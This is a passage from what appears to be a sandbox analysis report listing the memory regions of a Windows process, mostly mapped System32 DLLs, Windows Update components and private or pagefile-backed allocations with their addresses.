filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 1448
start_va = 0x7fefd980000
end_va = 0x7fefd9a2fff
entry_point = 0x7fefd980000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1449
start_va = 0x7fefda20000
end_va = 0x7fefda2afff
entry_point = 0x7fefda20000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1450
start_va = 0x7fefda50000
end_va = 0x7fefda74fff
entry_point = 0x7fefda50000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1451
start_va = 0x7fefda80000
end_va = 0x7fefda8efff
entry_point = 0x7fefda80000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1452
start_va = 0x7fefda90000
end_va = 0x7fefdb20fff
entry_point = 0x7fefda90000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1453
start_va = 0x7fefdb30000
end_va = 0x7fefdb6cfff
entry_point = 0x7fefdb30000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1454
start_va = 0x7fefdb70000
end_va = 0x7fefdb83fff
entry_point = 0x7fefdb70000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1455
start_va = 0x7fefdb90000
end_va = 0x7fefdb9efff
entry_point = 0x7fefdb90000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1456
start_va = 0x7fefdc30000
end_va = 0x7fefdc3efff
entry_point = 0x7fefdc30000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1457
start_va = 0x7fefdce0000
end_va = 0x7fefdd15fff
entry_point = 0x7fefdce0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1458
start_va = 0x7fefdd20000
end_va = 0x7fefdd59fff
entry_point = 0x7fefdd20000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1459
start_va = 0x7fefdd60000
end_va = 0x7fefddcafff
entry_point = 0x7fefdd60000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1460
start_va = 0x7fefddd0000
end_va = 0x7fefdde9fff
entry_point = 0x7fefddd0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1461
start_va = 0x7fefddf0000
end_va = 0x7fefdf56fff
entry_point = 0x7fefddf0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1462
start_va = 0x7fefdf60000
end_va = 0x7fefdfc6fff
entry_point = 0x7fefdf60000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1463
start_va = 0x7fefdfd0000
end_va = 0x7fefed57fff
entry_point = 0x7fefdfd0000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1464
start_va = 0x7fefed60000
end_va = 0x7fefed8dfff
entry_point = 0x7fefed60000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1465
start_va = 0x7fefee30000
end_va = 0x7fefee7cfff
entry_point = 0x7fefee30000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1466
start_va = 0x7feff0e0000
end_va = 0x7feff1bafff
entry_point = 0x7feff0e0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1467
start_va = 0x7feff1c0000
end_va = 0x7feff1defff
entry_point = 0x7feff1c0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1468
start_va = 0x7feff1e0000
end_va = 0x7feff2e8fff
entry_point = 0x7feff1e0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1469
start_va = 0x7feff2f0000
end_va = 0x7feff4c6fff
entry_point = 0x7feff2f0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1470
start_va = 0x7feff4d0000
end_va = 0x7feff598fff
entry_point = 0x7feff4d0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1471
start_va = 0x7feff5a0000
end_va = 0x7feff63efff
entry_point = 0x7feff5a0000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1472
start_va = 0x7feff640000
end_va = 0x7feff6b0fff
entry_point = 0x7feff640000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1473
start_va = 0x7feff860000
end_va = 0x7feff86dfff
entry_point = 0x7feff860000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1474
start_va = 0x7feff9a0000
end_va = 0x7feffa38fff
entry_point = 0x7feff9a0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1475
start_va = 0x7feffa40000
end_va = 0x7feffc42fff
entry_point = 0x7feffa40000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1476
start_va = 0x7feffc50000
end_va = 0x7feffd7cfff
entry_point = 0x7feffc50000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1477
start_va = 0x7feffd80000
end_va = 0x7feffe56fff
entry_point = 0x7feffd80000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1478
start_va = 0x7feffe60000
end_va = 0x7feffeb1fff
entry_point = 0x7feffe60000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1479
start_va = 0x7feffec0000
end_va = 0x7feffec7fff
entry_point = 0x7feffec0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1480
start_va = 0x7fefff60000
end_va = 0x7fefff60fff
entry_point = 0x7fefff60000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1481
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 1482
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 1483
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 1484
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 1485
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 1486
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 1487
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 1488
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 1489
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 1490
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 1491
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 1492
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 1493
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 1494
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 1495
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1496
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 1497
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1498
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 1499
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1500
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 1501
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 1502
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1503
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1504
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1505
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1506
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 1507
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1508
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1509
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1510
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1511
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1512
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1513
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1514
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1515
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1516
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1517
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1518
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1519
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1520
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1521
start_va = 0xdd0000
end_va = 0xdd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000dd0000"
filename = ""
Region:
id = 1522
start_va = 0xde0000
end_va = 0xde0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000de0000"
filename = ""
Region:
id = 1523
start_va = 0x3080000
end_va = 0x30fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003080000"
filename = ""
Region:
id = 1524
start_va = 0x7fef5990000
end_va = 0x7fef59a1fff
entry_point = 0x7fef5990000
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1525
start_va = 0x2b50000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 1526
start_va = 0x7fee2e60000
end_va = 0x7fee2ea4fff
entry_point = 0x7fee2e60000
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1527
start_va = 0x7fef7030000
end_va = 0x7fef7040fff
entry_point = 0x7fef7030000
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1528
start_va = 0x7fef7190000
end_va = 0x7fef71f3fff
entry_point = 0x7fef7190000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1529
start_va = 0x7fef7200000
end_va = 0x7fef7270fff
entry_point = 0x7fef7200000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1530
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2627
start_va = 0x2470000
end_va = 0x24effff
entry_point = 0x0
region_type = private
name = "private_0x0000000002470000"
filename = ""
Region:
id = 2628
start_va = 0x26b0000
end_va = 0x272ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 2629
start_va = 0x2d50000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 2630
start_va = 0x3170000
end_va = 0x31effff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Region:
id = 2631
start_va = 0x3360000
end_va = 0x33dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003360000"
filename = ""
Region:
id = 2632
start_va = 0x3670000
end_va = 0x36effff
entry_point = 0x0
region_type = private
name = "private_0x0000000003670000"
filename = ""
Region:
id = 2633
start_va = 0x3700000
end_va = 0x377ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 2634
start_va = 0x3790000
end_va = 0x380ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003790000"
filename = ""
Region:
id = 2635
start_va = 0x3b00000
end_va = 0x3b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 2636
start_va = 0x4000000
end_va = 0x407ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004000000"
filename = ""
Region:
id = 2637
start_va = 0x7fee1e60000
end_va = 0x7fee20b2fff
entry_point = 0x7fee1e60000
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 2638
start_va = 0x7fee2d60000
end_va = 0x7fee2d6efff
entry_point = 0x7fee2d60000
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 2639
start_va = 0x7fee34e0000
end_va = 0x7fee3759fff
entry_point = 0x7fee34e0000
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 2640
start_va = 0x7fef54d0000
end_va = 0x7fef5540fff
entry_point = 0x7fef54d0000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 2641
start_va = 0x7fef7de0000
end_va = 0x7fef7dfafff
entry_point = 0x7fef7de0000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 2642
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 2643
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 2644
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 2645
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 2646
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 2647
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 2648
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 2649
start_va = 0xec0000
end_va = 0xfbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ec0000"
filename = ""
Region:
id = 2650
start_va = 0x1960000
end_va = 0x196ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001960000"
filename = ""
Region:
id = 2651
start_va = 0x77e00000
end_va = 0x77e06fff
entry_point = 0x77e00000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2652
start_va = 0x7fefd5d0000
end_va = 0x7fefd5d7fff
entry_point = 0x7fefd5d0000
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 2653
start_va = 0x7fee2310000
end_va = 0x7fee231cfff
entry_point = 0x7fee2310000
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 3521
start_va = 0xe00000
end_va = 0xe19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 3522
start_va = 0xe20000
end_va = 0xe20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 3523
start_va = 0xe30000
end_va = 0xe30fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e30000"
filename = ""
Region:
id = 3524
start_va = 0xfc0000
end_va = 0xfc7fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fc0000"
filename = ""
Region:
id = 3525
start_va = 0xfd0000
end_va = 0xfdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fd0000"
filename = ""
Region:
id = 3526
start_va = 0xfe0000
end_va = 0xfeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fe0000"
filename = ""
Region:
id = 3527
start_va = 0xff0000
end_va = 0xffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ff0000"
filename = ""
Region:
id = 3528
start_va = 0x1000000
end_va = 0x1000fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 3529
start_va = 0x1020000
end_va = 0x1021fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 3530
start_va = 0x1030000
end_va = 0x1030fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001030000"
filename = ""
Region:
id = 3531
start_va = 0x1040000
end_va = 0x104ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 3532
start_va = 0x1050000
end_va = 0x1057fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 3533
start_va = 0x13b0000
end_va = 0x13bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 3534
start_va = 0x13c0000
end_va = 0x13cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 3535
start_va = 0x14d0000
end_va = 0x14d7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000014d0000"
filename = ""
Region:
id = 3536
start_va = 0x14e0000
end_va = 0x14effff
entry_point = 0x14e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 3537
start_va = 0x14f0000
end_va = 0x14fffff
entry_point = 0x14f0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 3538
start_va = 0x1500000
end_va = 0x150ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 3539
start_va = 0x1510000
end_va = 0x151ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 3540
start_va = 0x16a0000
end_va = 0x16affff
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 3541
start_va = 0x16b0000
end_va = 0x16b7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000016b0000"
filename = ""
Region:
id = 3542
start_va = 0x16c0000
end_va = 0x16cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016c0000"
filename = ""
Region:
id = 3543
start_va = 0x1970000
end_va = 0x197ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001970000"
filename = ""
Region:
id = 3544
start_va = 0x1980000
end_va = 0x198ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001980000"
filename = ""
Region:
id = 3545
start_va = 0x1990000
end_va = 0x199ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001990000"
filename = ""
Region:
id = 3546
start_va = 0x19a0000
end_va = 0x19affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000019a0000"
filename = ""
Region:
id = 3547
start_va = 0x19b0000
end_va = 0x19bffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000019b0000"
filename = ""
Region:
id = 3548
start_va = 0x19c0000
end_va = 0x19cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000019c0000"
filename = ""
Region:
id = 3549
start_va = 0x1ce0000
end_va = 0x1ceffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ce0000"
filename = ""
Region:
id = 3550
start_va = 0x1cf0000
end_va = 0x1cfffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cf0000"
filename = ""
Region:
id = 3551
start_va = 0x1d00000
end_va = 0x1d0ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d00000"
filename = ""
Region:
id = 3552
start_va = 0x1d10000
end_va = 0x1d1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d10000"
filename = ""
Region:
id = 3553
start_va = 0x1d20000
end_va = 0x1d2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d20000"
filename = ""
Region:
id = 3554
start_va = 0x1d30000
end_va = 0x1d3ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d30000"
filename = ""
Region:
id = 3555
start_va = 0x2d50000
end_va = 0x2d8ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002d50000"
filename = ""
Region:
id = 3556
start_va = 0x2d90000
end_va = 0x2dcffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002d90000"
filename = ""
Region:
id = 3557
start_va = 0x31f0000
end_va = 0x32affff
entry_point = 0x31f0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 3558
start_va = 0x3610000
end_va = 0x370ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 3559
start_va = 0x3710000
end_va = 0x380ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003710000"
filename = ""
Region:
id = 3560
start_va = 0x3ad0000
end_va = 0x3bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ad0000"
filename = ""
Region:
id = 3561
start_va = 0x3ff0000
end_va = 0x40effff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ff0000"
filename = ""
Region:
id = 3562
start_va = 0x4750000
end_va = 0x484ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004750000"
filename = ""
Region:
id = 3563
start_va = 0x4850000
end_va = 0x494ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004850000"
filename = ""
Region:
id = 3564
start_va = 0x4950000
end_va = 0x594ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 3565
start_va = 0x59a0000
end_va = 0x5a1ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000059a0000"
filename = ""
Region:
id = 3566
start_va = 0x5a30000
end_va = 0x5aaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a30000"
filename = ""
Region:
id = 3567
start_va = 0x7fef37f0000
end_va = 0x7fef39c3fff
entry_point = 0x7fef37f0000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 3568
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 3569
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 3570
start_va = 0x16d0000
end_va = 0x16d0fff
entry_point = 0x16d0000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 3571
start_va = 0x17e0000
end_va = 0x17fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017e0000"
filename = ""
Region:
